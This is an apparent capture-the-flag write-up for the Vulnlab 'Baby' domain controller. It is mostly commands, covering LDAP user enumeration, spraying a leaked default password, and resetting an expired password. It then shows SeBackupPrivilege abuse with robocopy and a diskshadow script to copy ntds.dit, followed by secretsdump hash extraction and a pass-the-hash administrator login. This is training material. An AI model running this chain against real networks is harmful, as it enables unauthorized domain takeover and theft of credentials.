Baby - Vulnlab

Enumeration

Let's start by enumerating all TCP ports with nmap.
nmap -sCV -p- --min-rate 1000 -v 10.10.74.147 -Pn
Pasted image 20241014121322.png
I have LDAP(port 3268) and RPC(port 49667).

Let's add this domain to /etc/hosts.
echo '10.10.74.147 baby.vl' | sudo tee -a /etc/hosts
Pasted image 20241014113628.png
echo '10.10.74.147 BabyDC.baby.vl' | sudo tee -a /etc/hosts
Pasted image 20241014121623.png

Let's enumerate UDP ports aswell.
sudo nmap -Pn -n 10.10.74.147 -sU --top-ports=100
Pasted image 20241014120348.png
I have DNS(port 53), kerberos(port 88) and ntp(port 123).

LDAP - port 3268

Let's enumerate users on LDAP server with windapsearch.py script.
python /root/windapsearch/windapsearch.py -d baby.vl0 --dc-ip 10.10.74.147 -U
Pasted image 20241014113935.png
I got a lot of usernames so let's add them to a txt file.
python /root/windapsearch/windapsearch.py -d baby.vl --dc-ip 10.10.74.147 -U | grep '@' | cut -d ' ' -f 2 | cut -d '@' -f 1 | uniq > users.txt
cat users.txt
Pasted image 20241014114634.png
Since there is some usernames let's see if there is also passwords.
python /root/windapsearch/windapsearch.py -d baby.vl --dc-ip 10.10.74.147 -U --full | grep Password
Pasted image 20241014114346.png
No password was found so let's try a different approach and use it without filter.
python /root/windapsearch/windapsearch.py -d baby.vl --dc-ip 10.10.74.147 -U --full
Pasted image 20241014115224.png
Now i have Teresa.Bell:BabyStart123! credentials so try to check for WinRM access with this credential.
crackmapexec winrm 10.10.74.147 -u users.txt -p 'BabyStart123!' -d BabyDC.baby.vl
Pasted image 20241014122243.png
Since it doesn't work i tried to access smb but it didn't work aswell so let's use ldapsearch to look for more details.
ldapsearch -x -H ldap://10.10.74.147 -D '' -w '' -b "DC=baby,DC=vl"
Pasted image 20241014123401.png
I saw a different username called Caroline.Robinson wich i will include on the users txt file and run crackmapexec again.
crackmapexec smb 10.10.74.147 -u users.txt -p 'BabyStart123!' -d BabyDC.baby.vl
Pasted image 20241014123720.png

Status_Password_Must_Change - SMB - smbpasswd

Seems that we have a user that can have password changed so let's do it with smbpasswd tool.
smbpasswd -U Caroline.Robinson -r 10.10.74.147
BabyStart123!
BabyStart123!123!
Pasted image 20241014124018.png
Let's check if i have access using crackmapexec once again.
crackmapexec winrm 10.10.74.147 -u Caroline.Robinson -p 'BabyStart123!123!' -d BabyDC.baby.vl
Pasted image 20241014124312.png
It worked! So let's login using evil-winrm.
evil-winrm -i BabyDC.baby.vl -u Caroline.Robinson -p 'BabyStart123!123!'
Pasted image 20241014124444.png

Privilege Escalation

Let's get user flag.
cd ..
cd /Desktop
dir
Pasted image 20241014124610.png

User Privileges - SeRestorePrivilege

whoami /priv
Pasted image 20241014124744.png
Since we have SeBackupPrivilege wich backup files and directories let's abuse with robocopy command tool from Windows terminal to retrieve files from the Administrator Desktop.
robocopy /b C:\Users\Administrator\Desktop\ C:\
Pasted image 20241014125031.png
By chekcing C:\ i can notice that i have Administrator Files like for example root flag.
dir
Pasted image 20241014125145.png

Sam & System file - uwu.dsh & secretsdump

I found out on this link a method to recover SAM and ntds files by creating a .dsh file.
reg save hklm\system c:\Temp\system
nano uwu.dsh

set context persistent nowriters
add volume c: alias owo
create
expose %owo% z:

unixunix2dos uwu.dsh
cd C:\Windows\Temp
upload uwu.dsh
diskshadow /s uwu.dsh
Pasted image 20241014133942.png
robocopy /b z:\windows\ntds . ntds.dit
Pasted image 20241014133917.png
download ntds.dit
download system
Pasted image 20241014133856.png
impacket-secretsdump -ntds ntds.dit -system system local
Pasted image 20241014133839.png
evil-winrm -i 10.10.74.147 -u administrator -H "ee4457ae59f1e3fbd764e33d9cef123d"
Pasted image 20241014133822.png